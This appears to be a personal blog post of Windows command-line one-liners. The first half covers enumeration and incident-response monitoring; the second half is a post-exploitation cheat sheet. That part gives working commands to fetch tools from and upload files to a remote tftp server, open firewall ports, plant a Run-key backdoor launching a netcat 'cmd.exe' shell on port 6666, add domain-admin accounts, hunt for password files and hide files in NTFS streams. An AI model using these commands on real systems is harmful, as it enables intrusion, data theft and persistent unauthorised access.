crazylazy.info

txtIt came to my mind when I read the Pauldotcom section about wmic enumeration. There's a lot more you can do, even on Windows promts.

- The incident-response section is useful if you have a script running, every day, and you compare these logs. I think most commands are from a script for incident response I once got... I didn't figure them out on my own. So no big deal: here they are, inspired by Ed Skoudis Commandline Kung Fu and several findings and the Pauldotcom section:

get system time and date

echo %date% %time%

enumerate local accounts, local groups, currently logged on users, and members of the administrators group

net users

Currently Logged on Users

psloggedon /accepteula

Local Groups

net localgroup

Members of the local administrators group

net localgroup administrators
net localgroup administrators /domain

Grab network info, arp tables, open connections, and firewall status

Current IP Configuration

ipconfig /all

Contents of the DNS Cache

ipconfig /displaydns

ARP Table Contents

arp -a

list domains in workgroup

net view /domain

Enumerate all domain users (unprivileged)

netsh -r {ipaddress-of-remote-target} dump > ulist.txt

List shares

net share
net view \\servername

Wireless enumeration in Windows Vista

netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show profiles
netsh wlan show networks mode=bssid'

Status of active TCP and UDP connections

netstat -ano
netstat -anbv

Routing Table

route print

Hosts file contents

type %systemroot%\system32\drivers\etc\hosts

Works with almost every file. Depending on your access-level of course.

Windows Firewall Configuration

netsh firewall show state

Windows Firewall service state

netsh firewall show service
netsh firewall show allowedprogram
netsh firewall show portopening
netsh firewall show conf
netsh diag show all /v

Mapped Network Drives

net use

Grab a list of installed software and running processes

The small tools are here. You can use netcat to transfer them or simply net start %something%, if you've do work remotely.

Machine Information

psinfo /accepteula /h /s

Running Processes

pslist -t /accepteula

Enumerate services running out of each process

Services running from each process

tasklist /svc

Grab state of all services on the machine

sc query state= all

Grab a list of the printers on the machine and properties

cscript %WINDIR%\System32\Prnmngr.vbs -l

note: this is really awesome... I think. You can abuse a Printer's IP for IDS evasion tactics by spoofing it. Some printers tend to have firmware vulnerabilities; some multifunction devices tend to have documents stored. There's even a rumor of people wardialing these multi-function devices if they've got LAN access and telephone access. But that's a joke I guess.

Grab group policies applied to the machine

Effective group policies

gpresult

Grab drivers in use on the machine

For some of my own research to pwn stuff (device drivers are in a very sloppy development circle... more later) this is kind of kewl

Drivers currently in use

driverquery

grab system variables

set

Dump the IE and Firefox history for all users on the machine

cscript IE_FireFox.vbs

note: this of course harms the privacy of people and is almost never in scope.

Deeper incident-response

Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER

reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %somepath%\HKLMrun.reg
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %somepath%\HKLMrunonce.reg
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %somepath%\HKCUrun.reg
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %somepath%\HKCUrunonce.reg

You can set %somepath% or use %computername% or any other defined variable. I just use it to monitor some systems. Nothing beats this: let these scripts run every day and diff the output. You see (almost) everything! That's btw. what I call security: monitoring, behavior detection... to know what's normal and what's not.

Grab Sytem Error Log for Review (Error ONLY)

cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System

note: if you want to store this, just add >> dailyenumeration.txt after this.

Grab Application Error Logs for Review

cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application

calculate MD5 hashes of the system directory

This is just AWESOME for me: %somepath% again is just to post it here. I have a complex log rotation system with compression. If there's something I oversee, I find it for documentation issues.

echo %date% %time% >> %somepath%\osmd5-%computername%.txt
md5sums %systemroot% >> %somepath%\osmd5-%computername%.txt
md5sums %systemroot%\system >> %somepath%\osmd5-%computername%.txt
md5sums %systemroot%\system32 >> %somepath%\osmd5-%computername%.txt
echo %date% %time% >> %somepath%\osmd5-%computername%.txt

Again I have to say: I did not create this. Just collected stuff here and there. I'll add more... btw: please use the zoom function in your browser. ;) Easier on the eyes.

Deeper post-exploitation

This is not incident-response any more. This is maintaining access and causing damage. Make sure your scope covers this, otherwise you're out.

Transfer files

You have to use a tftp server somewhere (and a way to circumvent the firewall):

tftp -i ip-address-of-tftp-server get toolname.exe

Upload files from target to remote server

tftp -i ip-address-of-tftp-server put filename-to-upload.txt

Allow program to listen through the firewall:

netsh firewall add allowedprogram C:\nltest.exe mltest enable

Open a port at the firewall

netsh firewall add portopening tcp 6666 lt enable all

Using edit

I actually prefer this and paste:

edit file.txt

Portscans with nbstat

nbtstat -A 192.168.1.1
netstat -an | find /i "established"

Looking for some precious files

type *.* | find /i "internal"
dir /s *.xls
dir /s password*

Show hidden files, too

dir /s /a:h

Log the filestructure

tree >filestructure.txt

Adding a backdoor

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v listener /d "C:\Windows\System32\nc.exe -p 6666 -L -d -e cmd.exe"

And verify by querying again. Of course nc has to be transfered, before... and the -L is for the Windows version of nc. Cygwin's just runs in Cygwin environment.
Then reboot and have fun!

note: I would never use nc. I'd cover this traffic into http. But let's stay constructive for now.

Add a user

net user boesewicht letmein /add
net localgroup Administrators boesewicht /add
net group "domain admins" boesewicht /add

First command is for setting the password, second is for granting admin privileges, third one is for granting domain admin privileges. Afterwards you are in.

Leave proof

I had some of the "proof it" issues. Well here is a way to convince people:

net use

net view \\win2k-docs
net use * \\win2k-docs

net use

cd to the path, leave a file or two on the admin's Desktop. You can also (ab)use the NTFS feature of multiple file streams to hide files in other files. Use the ":" between the two files you stenographically want to store into each other.



Have fun,
wishi